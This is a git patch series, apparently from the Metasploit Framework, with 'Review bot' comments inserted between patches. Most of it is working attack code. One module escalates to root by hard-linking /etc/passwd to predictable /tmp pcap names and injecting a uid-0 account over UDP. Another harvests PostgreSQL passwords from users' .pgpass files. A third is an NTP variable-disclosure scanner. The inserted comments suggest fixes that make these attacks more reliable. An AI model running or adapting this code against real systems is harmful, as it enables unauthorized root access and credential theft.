From d148acdce3c4a0968622933ecd6e25feec8c20f2 Mon Sep 17 00:00:00 2001
From: 0a2940 <0a2940@gmail.com>
Date: Sat, 21 Jul 2012 12:18:43 +0100
Subject: [PATCH 01/64] added exploit for metasploit pcap_log prov-esc
---
 .../post/multi/escalate/metasploit_pcaplog.rb | 102 ++++++++++++++++++
 1 file changed, 102 insertions(+)
 create mode 100644 modules/post/multi/escalate/metasploit_pcaplog.rb
diff --git a/modules/post/multi/escalate/metasploit_pcaplog.rb b/modules/post/multi/escalate/metasploit_pcaplog.rb
new file mode 100644
index 0000000000..92537dd465
--- /dev/null
+++ b/modules/post/multi/escalate/metasploit_pcaplog.rb
@@ -0,0 +1,102 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+require 'rex'
+require 'msf/core/post/common'
+require 'msf/core/post/file'
+require 'msf/core/post/linux/priv'
+require 'msf/core/exploit/local/linux_kernel'
+require 'msf/core/exploit/local/linux'
+require 'msf/core/exploit/local/unix'
+
+load 'lib/msf/core/post/common.rb'
+load 'lib/msf/core/post/file.rb'
+load 'lib/msf/core/exploit/local/unix.rb'
+load 'lib/msf/core/exploit/local/linux.rb'
+
+class Metasploit3 < Msf::Post
+ Rank = ExcellentRanking
+
+ include Msf::Post::File
+ include Msf::Post::Common
+
+ include Msf::Exploit::Local::Linux
+ include Msf::Exploit::Local::Unix
+
+ def initialize(info={})
+ super( update_info( info, {
+ 'Name' => 'Metasploit pcap_log Local Privilege Escalation',
+ 'Description' => %q{
+ Metasploit < 4.4 contains a vulnerable 'pcap_log' plugin which, when used with the default settings,
+ creates pcap files in /tmp with predictable file names. This exploits this by hard-linking these
+ filenames to /etc/passwd, then sending a packet with a priviliged user entry contained within.
+ This, and all the other packets, are appended to /etc/passwd.
+
+ Successful exploitation results in the creation of a 'metasploit' superuser with password 'metasploit'.
+
+ This module requires manual clean-up - remove /tmp/msf3-session*pcap files and truncate /etc/passwd.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => [ '0a29406d9794e4f9b30b3c5d6702c708'],
+ 'Platform' => [ 'linux','unix','bsd' ],
+ 'SessionTypes' => [ 'shell', 'meterpreter' ],
+ 'References' =>
+ [
+ [ 'BID', '54472' ],
+ [ 'URL', 'http://0a29.blogspot.com/2012/07/0a29-12-2-metasploit-pcaplog-plugin.html'],
+ [ 'URL', 'https://community.rapid7.com/docs/DOC-1946' ],
+ ],
+ 'DisclosureDate' => "Jul 16 2012",
+ 'Targets' =>
+ [
+ [ 'Linux/Unix Universal', {} ],
+ ],
+ 'DefaultTarget' => 0,
+ }
+ ))
+ register_options(
+ [
+ Opt::RPORT(2940)
+ ], self)
+ end
+
+ def run
+ print_status "Waiting for victim"
+ initial_size = cmd_exec("cat /etc/passwd | wc -l")
+ i = 60
+ while(true) do
+ if (i == 60) then
+ # 0a2940: cmd_exec is slow, so send 1 command to do all the links
+ cmd_exec("for i in $(seq 0 120); do ln /etc/passwd /tmp/msf3-session_`date --date=\"\$i seconds\" +%Y-%m-%d_%H-%M-%S`.pcap ; done")
+ i = 0
+ end
+ i = i+1
+ if(cmd_exec("cat /etc/passwd | wc -l") != initial_size) then
+ # PCAP is flowing
+ pkt = "\n\nmetasploit:me6dSmAVu0TRU:0:0:Metasploit Root Account:/tmp:/bin/bash\n\n"
+ print_status("Sending file contents payload to #{session.session_host}")
+ udpsock = Rex::Socket::Udp.create(
+ {
+ 'Context' => {'Msf' => framework, 'MsfExploit'=>self}
+ })
+ udpsock.sendto(pkt, session.session_host, datastore['RPORT'])
+ break
+ end
+ sleep(1)
+ end
+
+ if cmd_exec("(grep Metasploit /etc/passwd > /dev/null && echo true) || echo false").include?("true")
+ then
+ print_good("Success. You should now be able to login or su to the 'metasploit' user with password 'metasploit'.")
+ else
+ print_error("Failed. You should manually verify the 'metasploit' user has not been added")
+ end
+ # 0a2940: Initially the plan was to have this post module switch user, upload & execute a new payload
+ # However beceause the session is not a terminal, su will not always allow this.
+ end
+end
From 176f6ea41e66e036ef05a137442d076c49fa45c1 Mon Sep 17 00:00:00 2001
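Review bot: The success check at the end of `run` in metasploit_pcaplog.rb greps /etc/passwd for the literal word `Metasploit`, so any line that already contains it (a pre-existing service account, for instance) makes the module print "Success" when nothing was written. Record the matching-line count next to `initial_size`, e.g. `before = cmd_exec("grep -c Metasploit /etc/passwd")`, and report success only if the count changed afterwards. The same check is carried unchanged through patches 03, 04 and 07. The module also leaves the hard links in /tmp and the appended capture data in /etc/passwd for manual clean-up; a comment above `run` listing exactly which paths are created and what is modified would make that clean-up verifiable on the assessed host.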
From: 0a2940 <0a2940@gmail.com> Date: Sun, 5 Aug 2012 18:20:44 +0200 Subject: [PATCH 02/64] added USERNAME and PASSWORD as options --- modules/post/multi/escalate/metasploit_pcaplog.rb | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) diff --git a/modules/post/multi/escalate/metasploit_pcaplog.rb b/modules/post/multi/escalate/metasploit_pcaplog.rb index 92537dd465..268d18a472 100644 --- a/modules/post/multi/escalate/metasploit_pcaplog.rb +++ b/modules/post/multi/escalate/metasploit_pcaplog.rb @@ -37,7 +37,7 @@ class Metasploit3 < Msf::Post filenames to /etc/passwd, then sending a packet with a priviliged user entry contained within. This, and all the other packets, are appended to /etc/passwd. - Successful exploitation results in the creation of a 'metasploit' superuser with password 'metasploit'. + Successful exploitation results in the creation of a new superuser account. This module requires manual clean-up - remove /tmp/msf3-session*pcap files and truncate /etc/passwd. }, @@ -60,8 +60,10 @@ class Metasploit3 < Msf::Post } )) register_options( - [ - Opt::RPORT(2940) + [ + Opt::RPORT(2940), + OptString.new("USERNAME", [ true, "Username for the new superuser", "metasploit" ]), + OptString.new("PASSWORD", [ true, "Password for the new superuser", "metasploit" ]) ], self) end @@ -78,7 +80,7 @@ class Metasploit3 < Msf::Post i = i+1 if(cmd_exec("cat /etc/passwd | wc -l") != initial_size) then # PCAP is flowing - pkt = "\n\nmetasploit:me6dSmAVu0TRU:0:0:Metasploit Root Account:/tmp:/bin/bash\n\n" + pkt = "\n\n" + datastore['USERNAME'] + ":" + datastore['PASSWORD'].crypt("0a") + ":0:0:Metasploit Root Account:/tmp:/bin/bash\n\n" print_status("Sending file contents payload to #{session.session_host}") udpsock = Rex::Socket::Udp.create( { 
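Review bot: The new `PASSWORD` option defaults to `metasploit` and is hashed with the fixed salt in `crypt("0a")`, so every run that keeps the defaults writes the same publicly known hash for a uid-0 account into the assessed host's /etc/passwd. A two-character salt normally selects traditional DES crypt, which also ignores everything after the eighth character of the password. Dropping the default so the operator has to choose a value, `OptString.new("PASSWORD", [ true, "Password for the new superuser" ])`, avoids leaving a well-known credential behind after an engagement. `USERNAME` is concatenated into the passwd line unvalidated, and a value containing `:` or a newline would write a malformed entry; reject anything that does not match `/\A[a-z_][a-z0-9_-]*\z/` before `pkt` is built.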
@@ -99,4 +101,4 @@ class Metasploit3 < Msf::Post # 0a2940: Initially the plan was to have this post module switch user, upload & execute a new payload # However beceause the session is not a terminal, su will not always allow this. end -end +end \ No newline at end of file From f5b3886e8cff7ac30754da73dfaeac3d9749ab54 Mon Sep 17 00:00:00 2001 From: 0a2940 <0a2940@gmail.com> Date: Mon, 6 Aug 2012 10:41:55 +0200 Subject: [PATCH 03/64] fix success/fail print statements --- modules/post/multi/escalate/metasploit_pcaplog.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/post/multi/escalate/metasploit_pcaplog.rb b/modules/post/multi/escalate/metasploit_pcaplog.rb index 268d18a472..c4a22596e3 100644 --- a/modules/post/multi/escalate/metasploit_pcaplog.rb +++ b/modules/post/multi/escalate/metasploit_pcaplog.rb @@ -94,9 +94,9 @@ class Metasploit3 < Msf::Post if cmd_exec("(grep Metasploit /etc/passwd > /dev/null && echo true) || echo false").include?("true") then - print_good("Success. You should now be able to login or su to the 'metasploit' user with password 'metasploit'.") + print_good("Success. You should now be able to login or su to the '" + datastore['USERNAME'] + "' account") else - print_error("Failed. You should manually verify the 'metasploit' user has not been added") + print_error("Failed. You should manually verify the '" + datastore['USERNAME'] + "' user has not been added") end # 0a2940: Initially the plan was to have this post module switch user, upload & execute a new payload # However beceause the session is not a terminal, su will not always allow this. From f728d32f60e59e7df2fbc5b2586bf8ffda7ab136 Mon Sep 17 00:00:00 2001 From: 0a2940 <0a2940@gmail.com> Date: Thu, 13 Sep 2012 11:14:45 +0200 Subject: [PATCH 04/64] code style improvement - remove 'then' from 'if's --- modules/post/multi/escalate/metasploit_pcaplog.rb | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) 
diff --git a/modules/post/multi/escalate/metasploit_pcaplog.rb b/modules/post/multi/escalate/metasploit_pcaplog.rb index c4a22596e3..87afaf301c 100644 --- a/modules/post/multi/escalate/metasploit_pcaplog.rb +++ b/modules/post/multi/escalate/metasploit_pcaplog.rb @@ -72,13 +72,13 @@ class Metasploit3 < Msf::Post initial_size = cmd_exec("cat /etc/passwd | wc -l") i = 60 while(true) do - if (i == 60) then + if (i == 60) # 0a2940: cmd_exec is slow, so send 1 command to do all the links cmd_exec("for i in $(seq 0 120); do ln /etc/passwd /tmp/msf3-session_`date --date=\"\$i seconds\" +%Y-%m-%d_%H-%M-%S`.pcap ; done") i = 0 end i = i+1 - if(cmd_exec("cat /etc/passwd | wc -l") != initial_size) then + if (cmd_exec("cat /etc/passwd | wc -l") != initial_size) # PCAP is flowing pkt = "\n\n" + datastore['USERNAME'] + ":" + datastore['PASSWORD'].crypt("0a") + ":0:0:Metasploit Root Account:/tmp:/bin/bash\n\n" print_status("Sending file contents payload to #{session.session_host}") @@ -93,7 +93,6 @@ class Metasploit3 < Msf::Post end if cmd_exec("(grep Metasploit /etc/passwd > /dev/null && echo true) || echo false").include?("true") - then print_good("Success. You should now be able to login or su to the '" + datastore['USERNAME'] + "' account") else print_error("Failed. You should manually verify the '" + datastore['USERNAME'] + "' user has not been added") From f48f77c0d7a53ea032460fec147559c0417d84c5 Mon Sep 17 00:00:00 2001 From: 0a2940 <0a2940@gmail.com> Date: Thu, 13 Sep 2012 11:19:00 +0200 Subject: [PATCH 05/64] compatibility improvement - backticks not $() For the comments above, and the fact we're using backticks later in the line also (uniformity++) --- modules/post/multi/escalate/metasploit_pcaplog.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/multi/escalate/metasploit_pcaplog.rb b/modules/post/multi/escalate/metasploit_pcaplog.rb index 87afaf301c..0c2bd28476 100644 --- a/modules/post/multi/escalate/metasploit_pcaplog.rb 
+++ b/modules/post/multi/escalate/metasploit_pcaplog.rb @@ -74,7 +74,7 @@ class Metasploit3 < Msf::Post while(true) do if (i == 60) # 0a2940: cmd_exec is slow, so send 1 command to do all the links - cmd_exec("for i in $(seq 0 120); do ln /etc/passwd /tmp/msf3-session_`date --date=\"\$i seconds\" +%Y-%m-%d_%H-%M-%S`.pcap ; done") + cmd_exec("for i in `seq 0 120` ; do ln /etc/passwd /tmp/msf3-session_`date --date=\"\$i seconds\" +%Y-%m-%d_%H-%M-%S`.pcap ; done") i = 0 end i = i+1 From 733f656b004b487edc748c261a8e80483000f18f Mon Sep 17 00:00:00 2001 From: 0a2940 <0a2940@gmail.com> Date: Thu, 13 Sep 2012 11:32:10 +0200 Subject: [PATCH 06/64] code style improvement - start counter at 0 --- modules/post/multi/escalate/metasploit_pcaplog.rb | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/modules/post/multi/escalate/metasploit_pcaplog.rb b/modules/post/multi/escalate/metasploit_pcaplog.rb index 0c2bd28476..8853855a68 100644 --- a/modules/post/multi/escalate/metasploit_pcaplog.rb +++ b/modules/post/multi/escalate/metasploit_pcaplog.rb @@ -70,14 +70,12 @@ class Metasploit3 < Msf::Post def run print_status "Waiting for victim" initial_size = cmd_exec("cat /etc/passwd | wc -l") - i = 60 + i = 0 while(true) do - if (i == 60) + if (i == 0) # 0a2940: cmd_exec is slow, so send 1 command to do all the links cmd_exec("for i in `seq 0 120` ; do ln /etc/passwd /tmp/msf3-session_`date --date=\"\$i seconds\" +%Y-%m-%d_%H-%M-%S`.pcap ; done") - i = 0 end - i = i+1 if (cmd_exec("cat /etc/passwd | wc -l") != initial_size) # PCAP is flowing pkt = "\n\n" + datastore['USERNAME'] + ":" + datastore['PASSWORD'].crypt("0a") + ":0:0:Metasploit Root Account:/tmp:/bin/bash\n\n" 
@@ -89,7 +87,8 @@ class Metasploit3 < Msf::Post udpsock.sendto(pkt, session.session_host, datastore['RPORT']) break end - sleep(1) + sleep(1) # wait a second + i = (i+1) % 60 # increment second counter end if cmd_exec("(grep Metasploit /etc/passwd > /dev/null && echo true) || echo false").include?("true") From cbce2c0fd57b58f2861666585acc36249c46d0d4 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Wed, 17 Oct 2012 17:30:30 -0500 Subject: [PATCH 07/64] Loop management, timeouts, and verbosity Add a todo for cred recording. Allow the user to determine when to give up. Changes while true to simply loop. Clear up some of the boolean checks. Inform the user what's going on. --- .../post/multi/escalate/metasploit_pcaplog.rb | 31 +++++++++++++------ 1 file changed, 22 insertions(+), 9 deletions(-) diff --git a/modules/post/multi/escalate/metasploit_pcaplog.rb b/modules/post/multi/escalate/metasploit_pcaplog.rb index 8853855a68..52feb3c0b1 100644 --- a/modules/post/multi/escalate/metasploit_pcaplog.rb +++ b/modules/post/multi/escalate/metasploit_pcaplog.rb @@ -20,7 +20,7 @@ load 'lib/msf/core/exploit/local/unix.rb' load 'lib/msf/core/exploit/local/linux.rb' class Metasploit3 < Msf::Post - Rank = ExcellentRanking + Rank = ManualRanking include Msf::Post::File include Msf::Post::Common 
@@ -63,28 +63,40 @@ class Metasploit3 < Msf::Post [ Opt::RPORT(2940), OptString.new("USERNAME", [ true, "Username for the new superuser", "metasploit" ]), - OptString.new("PASSWORD", [ true, "Password for the new superuser", "metasploit" ]) + OptString.new("PASSWORD", [ true, "Password for the new superuser", "metasploit" ]), + OptInt.new("MINUTES", [true, "Number of minutes to try to inject", 5]) ], self) end + def normalize_minutes + datastore["MINUTES"].abs rescue 0 + end + def run - print_status "Waiting for victim" + print_status "Setting up the victim's /tmp dir" initial_size = cmd_exec("cat /etc/passwd | wc -l") + print_status "/etc/passwd is currently #{initial_size} lines long" i = 0 - while(true) do + j = 0 + loop do if (i == 0) + j += 1 + break if j >= datastore['MINUTES'] + 1 # Give up after X minutes # 0a2940: cmd_exec is slow, so send 1 command to do all the links + print_status "Linking /etc/passwd to predictable tmp files (Attempt #{j})" cmd_exec("for i in `seq 0 120` ; do ln /etc/passwd /tmp/msf3-session_`date --date=\"\$i seconds\" +%Y-%m-%d_%H-%M-%S`.pcap ; done") end - if (cmd_exec("cat /etc/passwd | wc -l") != initial_size) + current_size = cmd_exec("cat /etc/passwd | wc -l") + if current_size == initial_size # PCAP is flowing pkt = "\n\n" + datastore['USERNAME'] + ":" + datastore['PASSWORD'].crypt("0a") + ":0:0:Metasploit Root Account:/tmp:/bin/bash\n\n" - print_status("Sending file contents payload to #{session.session_host}") + vprint_status("Sending /etc/passwd file contents payload to #{session.session_host}") udpsock = Rex::Socket::Udp.create( { 'Context' => {'Msf' => framework, 'MsfExploit'=>self} }) - udpsock.sendto(pkt, session.session_host, datastore['RPORT']) + res = udpsock.sendto(pkt, session.session_host, datastore['RPORT']) + else break end sleep(1) # wait a second 
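Review bot: `Rex::Socket::Udp.create` is now called on every pass of the loop (about once a second, for up to `MINUTES` minutes) and the socket is never closed, so descriptors pile up on the framework side for the whole run; create it once before `loop do` and close it in an `ensure`. `normalize_minutes` is defined but never called, since the give-up test reads `datastore['MINUTES'] + 1` directly, and its `rescue 0` modifier would silently turn any error into a zero-minute limit; either use it in the `break if` line or remove it. The value assigned to `res` from `sendto` is never read. The `# PCAP is flowing` comment now sits on the branch taken while the line count is unchanged, which reads as the opposite of what the condition tests, so it should be reworded to match.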
@@ -93,10 +105,11 @@ class Metasploit3 < Msf::Post if cmd_exec("(grep Metasploit /etc/passwd > /dev/null && echo true) || echo false").include?("true") print_good("Success. You should now be able to login or su to the '" + datastore['USERNAME'] + "' account") + # TODO: Consider recording our now-created username and password as a valid credential here. else - print_error("Failed. You should manually verify the '" + datastore['USERNAME'] + "' user has not been added") + print_error("Failed, the '" + datastore['USERNAME'] + "' user does not appear to have been added") end # 0a2940: Initially the plan was to have this post module switch user, upload & execute a new payload # However beceause the session is not a terminal, su will not always allow this. end -end \ No newline at end of file +end From 4d80e37741c001dd0ccb264689bfc0ad2c825a71 Mon Sep 17 00:00:00 2001 From: "Ewerson Guimaraes (Crash)" Date: Thu, 18 Oct 2012 20:03:28 -0300 Subject: [PATCH 08/64] NTP Clock Variables Disclosure --- modules/auxiliary/scanner/ntp/ntp_readvar.rb | 67 ++++++++++++++++++++ 1 file changed, 67 insertions(+) create mode 100644 modules/auxiliary/scanner/ntp/ntp_readvar.rb diff --git a/modules/auxiliary/scanner/ntp/ntp_readvar.rb b/modules/auxiliary/scanner/ntp/ntp_readvar.rb new file mode 100644 index 0000000000..34cbd132f9 --- /dev/null +++ b/modules/auxiliary/scanner/ntp/ntp_readvar.rb 
@@ -0,0 +1,67 @@
+#####
+
+
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+
+ include Msf::Exploit::Remote::Udp
+ include Msf::Auxiliary::Report
+ include Msf::Auxiliary::Scanner
+
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'NTP Clock Variables Disclosure',
+ 'Description' => %q{
+ This module reads the system internal NTP variables. These variables contain potentially sensitive
+ information, such as the NTP software version, operating system version, peers, and more..
+ },
+ 'Author' => 'Ewerson Guimaraes(Crash) ',
+ 'License' => MSF_LICENSE,
+ 'Version' => '',
+ 'References' =>
+ [
+ ['URL','http://www.rapid7.com/vulndb/lookup/ntp-clock-variables-disclosure' ],
+ ]
+ )
+ )
+ register_options(
+ [
+ Opt::RPORT(123)
+ ], self.class)
+ end
+
+ def run_host(ip)
+
+ connect_udp
+
+ readvar = "\x16\x02\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00" #readvar command
+ print_status("Connecting target #{rhost}:#{rport}...")
+
+ print_status("Sending command")
+ udp_sock.put(readvar)
+ reply = udp_sock.recvfrom(65535, 0.1)
+ p_reply =( reply[0].split(","))
+ arr_count = 0
+ while ( arr_count < p_reply.size)
+ if arr_count == 0
+ print_good (p_reply[arr_count].slice(12,p_reply[arr_count].size)) #12 is the adjustment of packet garbage
+ arr_count = arr_count + 1
+ else
+ print_good (p_reply[arr_count].strip)
+ arr_count = arr_count + 1
+ end
+ end
+ disconnect_udp
+
+ end
+
+end
\ No newline at end of file
From 6d5da1662be2ba6c3004bbf9819a0da21665d980 Mon Sep 17 00:00:00 2001
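Review bot: `run_host` in ntp_readvar.rb treats whatever datagram arrives as a readvar reply: the first field is cut with `slice(12, ...)` without checking that the reply is longer than the 12-byte header or that the header is a mode 6 response, so a truncated or unrelated packet is reported as NTP variables (and `slice` returns nil for a shorter string). Guard the parse with a length and header check, e.g. `return if reply.nil? || reply[0].to_s.length <= 12`. `disconnect_udp` is skipped whenever anything above it raises, so it belongs in an `ensure`. The module includes `Msf::Auxiliary::Report`, but nothing in this hunk records a finding, so results exist only as console output.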
From: 0a2940 <0a2940@gmail.com> Date: Wed, 24 Oct 2012 10:55:48 +0200 Subject: [PATCH 09/64] Update modules/post/multi/escalate/metasploit_pcaplog.rb Stance is now passive --- modules/post/multi/escalate/metasploit_pcaplog.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/post/multi/escalate/metasploit_pcaplog.rb b/modules/post/multi/escalate/metasploit_pcaplog.rb index 52feb3c0b1..3d06100110 100644 --- a/modules/post/multi/escalate/metasploit_pcaplog.rb +++ b/modules/post/multi/escalate/metasploit_pcaplog.rb @@ -56,6 +56,7 @@ class Metasploit3 < Msf::Post [ [ 'Linux/Unix Universal', {} ], ], + 'Stance' => Msf::Exploit::Stance::Passive, 'DefaultTarget' => 0, } )) From 32ddd981ebade16bb8e23b3e4a9763c23b9086d3 Mon Sep 17 00:00:00 2001 From: 0a2940 <0a2940@gmail.com> Date: Wed, 24 Oct 2012 10:58:09 +0200 Subject: [PATCH 10/64] linux_kernel mixin not required --- modules/post/multi/escalate/metasploit_pcaplog.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/post/multi/escalate/metasploit_pcaplog.rb b/modules/post/multi/escalate/metasploit_pcaplog.rb index 3d06100110..8502b2e075 100644 --- a/modules/post/multi/escalate/metasploit_pcaplog.rb +++ b/modules/post/multi/escalate/metasploit_pcaplog.rb @@ -10,7 +10,6 @@ require 'rex' require 'msf/core/post/common' require 'msf/core/post/file' require 'msf/core/post/linux/priv' -require 'msf/core/exploit/local/linux_kernel' require 'msf/core/exploit/local/linux' require 'msf/core/exploit/local/unix' From 2f0c2d76eacf8c8e3ba64904f1b7a68891fa1839 Mon Sep 17 00:00:00 2001 From: 0a2940 <0a2940@gmail.com> Date: Wed, 24 Oct 2012 11:01:26 +0200 Subject: [PATCH 11/64] remove load statements --- modules/post/multi/escalate/metasploit_pcaplog.rb | 5 ----- 1 file changed, 5 deletions(-) diff --git a/modules/post/multi/escalate/metasploit_pcaplog.rb b/modules/post/multi/escalate/metasploit_pcaplog.rb index 8502b2e075..64cdea7f19 100644 --- a/modules/post/multi/escalate/metasploit_pcaplog.rb 
+++ b/modules/post/multi/escalate/metasploit_pcaplog.rb @@ -13,11 +13,6 @@ require 'msf/core/post/linux/priv' require 'msf/core/exploit/local/linux' require 'msf/core/exploit/local/unix' -load 'lib/msf/core/post/common.rb' -load 'lib/msf/core/post/file.rb' -load 'lib/msf/core/exploit/local/unix.rb' -load 'lib/msf/core/exploit/local/linux.rb' - class Metasploit3 < Msf::Post Rank = ManualRanking From 3746a3ef6490bfe7cc10c05ec984e8fcc8192600 Mon Sep 17 00:00:00 2001 From: Zach Grace Date: Thu, 25 Oct 2012 21:30:54 -0500 Subject: [PATCH 12/64] adding pgpass_creds post module --- modules/post/multi/gather/pgpass_creds.rb | 112 ++++++++++++++++++++++ 1 file changed, 112 insertions(+) create mode 100644 modules/post/multi/gather/pgpass_creds.rb diff --git a/modules/post/multi/gather/pgpass_creds.rb b/modules/post/multi/gather/pgpass_creds.rb new file mode 100644 index 0000000000..74ac36f48b --- /dev/null +++ b/modules/post/multi/gather/pgpass_creds.rb 
@@ -0,0 +1,112 @@
+require 'msf/core'
+require 'rex'
+require 'msf/core/post/file'
+require 'msf/core/post/common'
+require 'msf/core/post/unix'
+require 'msf/core/post/windows/user_profiles'
+
+class Metasploit3 < Msf::Post
+
+ include Msf::Post::File
+ include Msf::Post::Common
+ include Msf::Post::Unix
+ include Msf::Post::Windows::UserProfiles
+
+ def initialize(info={})
+ super( update_info(info,
+ 'Name' => 'Multi Gather pgpass Credentials',
+ 'Description' => %q{
+ This module will collect the contents of user's .pgpass or pgpass.conf and
+ parse them for credentials. This module is largely based on firefox_creds.rb and
+ ssh_creds.rb.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => ['Zach Grace '],
+ 'Platform' => %w[linux bsd unix osx windows],
+ 'SessionTypes' => %w[meterpreter shell]
+ ))
+ end
+
+ def run
+ print_status("Finding pgpass creds")
+
+ files = []
+ case session.platform
+ when /unix|linux|bsd|osx/
+ files = enum_user_directories.map {|d| d + "/.pgpass"}.select { |f| file?(f) }
+ when /win/
+ if session.type != "meterpreter"
+ print_error("Only meterpreter sessions are supported on windows hosts")
+ return
+ end
+
+ grab_user_profiles.select do |user|
+ f = "#{user['AppData']}\\postgresql\\pgpass.conf"
+ if user['AppData'] && file?(f)
+ files << f
+ end
+ end
+ else
+ print_error("Unsupported platform #{session.platform}")
+ return
+ end
+
+ if files.nil? || files.empty?
+ print_error("No users found with a .pgpass or pgpass.conf file")
+ return
+ end
+
+ files.each do |f|
+ # Store the loot
+ print_good("Downloading #{f}")
+ store_loot("pgpass.#{f}", "text/plain", session, read_file(f), "#{f}", "pgpass #{f} File")
+ # Store the creds
+ parse_creds(f)
+ end
+ end
+
+ # Store the creds to
+ def parse_creds(f)
+ read_file(f).each_line do |entry|
+ ip, port, db, user, pass = entry.chomp.split(/:/, 5)
+
+ # Fix for some weirdness that happens with backslashes
+ p = ""
+ bs = false
+ pass.split(//).each do |c|
+ if c == "\\"
+ if bs == false
+ bs = true
+ p << c
+ else
+ # second backslash ignore
+ bs = false
+ end
+ else
+ if c == ":" && bs == true
+ p = "#{p[0,p.length-1]}:"
+ else
+ p << c
+ end
+ end
+ end
+
+ pass = p
+ print_good("Retrieved postgres creds #{ip}:#{port}/#{db} #{user}:#{pass}")
+
+ cred_hash = {
+ host: session.session_host,
+ port: port,
+ user: user,
+ pass: pass,
+ ptype: "password",
+ sname: "postgres",
+ source_type: "Cred",
+ duplicate_ok: true,
+ active: true
+ }
+
+ report_auth_info(cred_hash)
+ end
+ end
+end
From 43fe219a052ce05018c2c563727c4026ab5adc42 Mon Sep 17 00:00:00 2001
From: HD Moore
Date: Sun, 28 Oct 2012 22:57:18 -0500
Subject: [PATCH 13/64] This improves handling of 100-continue responses
---
 lib/rex/proto/http/client.rb | 88 +++++++++++++++++-----------------
 lib/rex/proto/http/packet.rb | 6 +++
 lib/rex/proto/http/response.rb | 17 +++++++
 3 files changed, 68 insertions(+), 43 deletions(-)
diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb
index c4af6d77d4..4d35a010b4 100644
--- a/lib/rex/proto/http/client.rb
+++ b/lib/rex/proto/http/client.rb
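Review bot: `parse_creds` in pgpass_creds.rb prints every recovered password in clear through `print_good("Retrieved postgres creds ... #{user}:#{pass}")`, which copies the secret into console scrollback and any spooled log even though it is already kept via `store_loot` and `report_auth_info`; the message should carry only host, port, database and user. The record is filed under `host: session.session_host` while the host field parsed from the file (`ip`) is discarded, so a credential for a remote database server ends up attributed to the wrong machine. Lines with fewer than five fields (.pgpass permits `#` comment lines) leave `pass` nil and `pass.split(//)` then raises, so add `next if pass.nil?` directly after the split.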
@@ -195,8 +195,7 @@ class Client # - cookie: Cookie header value # - ctype: Content-Type header value, default: +application/x-www-form-urlencoded+ # - data: HTTP data (only useful with some methods, see rfc2616) - # - encode: URI encode the supplied URI, default: false - # - encode_params: URI encode the GET or POST variables (names and values), default: true + # - encode: URI encode the supplied URI # - headers: HTTP headers as a hash, e.g. { "X-MyHeader" => "value" } # - method: HTTP method to use in the request, not limited to standard methods defined by rfc2616, default: GET # - proto: protocol, default: HTTP 
@@ -209,28 +208,28 @@ class Client # - vhost: Host header value # def request_cgi(opts={}) - c_enc = opts['encode'] || false - c_enc_p = (opts['encode_params'] == true or opts['encode_params'].nil? ? true : false) - c_cgi = opts['uri'] || '/' - c_body = opts['data'] || '' - c_meth = opts['method'] || 'GET' - c_prot = opts['proto'] || 'HTTP' - c_vers = opts['version'] || config['version'] || '1.1' - c_qs = opts['query'] || '' - c_varg = opts['vars_get'] || {} - c_varp = opts['vars_post'] || {} - c_head = opts['headers'] || config['headers'] || {} - c_rawh = opts['raw_headers'] || config['raw_headers'] || '' - c_type = opts['ctype'] || 'application/x-www-form-urlencoded' - c_ag = opts['agent'] || config['agent'] - c_cook = opts['cookie'] || config['cookie'] - c_host = opts['vhost'] || config['vhost'] - c_conn = opts['connection'] - c_path = opts['path_info'] - c_auth = opts['basic_auth'] || config['basic_auth'] || '' - uri = set_cgi(c_cgi) - qstr = c_qs - pstr = c_body + c_enc = opts['encode'] || false + c_cgi = opts['uri'] || '/' + c_body = opts['data'] || '' + c_meth = opts['method'] || 'GET' + c_prot = opts['proto'] || 'HTTP' + c_vers = opts['version'] || config['version'] || '1.1' + c_qs = opts['query'] || '' + c_varg = opts['vars_get'] || {} + c_varp = opts['vars_post'] || {} + c_head = opts['headers'] || config['headers'] || {} + c_rawh = opts['raw_headers']|| config['raw_headers'] || '' + c_type = opts['ctype'] || 'application/x-www-form-urlencoded' + c_ag = opts['agent'] || config['agent'] + c_cook = opts['cookie'] || config['cookie'] + c_host = opts['vhost'] || config['vhost'] + c_conn = opts['connection'] + c_path = opts['path_info'] + c_auth = opts['basic_auth'] || config['basic_auth'] || '' + + uri = set_cgi(c_cgi) + qstr = c_qs + pstr = c_body if (config['pad_get_params']) 1.upto(config['pad_get_params_count'].to_i) do |i| 
@@ -243,27 +242,25 @@ class Client c_varg.each_pair do |var,val| qstr << '&' if qstr.length > 0 - qstr << (c_enc_p ? set_encode_uri(var) : var) + qstr << set_encode_uri(var) qstr << '=' - qstr << (c_enc_p ? set_encode_uri(val) : val) + qstr << set_encode_uri(val) end if (config['pad_post_params']) 1.upto(config['pad_post_params_count'].to_i) do |i| - rand_var = Rex::Text.rand_text_alphanumeric(rand(32)+1) - rand_val = Rex::Text.rand_text_alphanumeric(rand(32)+1) pstr << '&' if pstr.length > 0 - pstr << (c_enc_p ? set_encode_uri(rand_var) : rand_var) + pstr << set_encode_uri(Rex::Text.rand_text_alphanumeric(rand(32)+1)) pstr << '=' - pstr << (c_enc_p ? set_encode_uri(rand_val) : rand_val) + pstr << set_encode_uri(Rex::Text.rand_text_alphanumeric(rand(32)+1)) end end c_varp.each_pair do |var,val| pstr << '&' if pstr.length > 0 - pstr << (c_enc_p ? set_encode_uri(var) : var) + pstr << set_encode_uri(var) pstr << '=' - pstr << (c_enc_p ? set_encode_uri(val) : val) + pstr << set_encode_uri(val) end req = '' @@ -297,7 +294,6 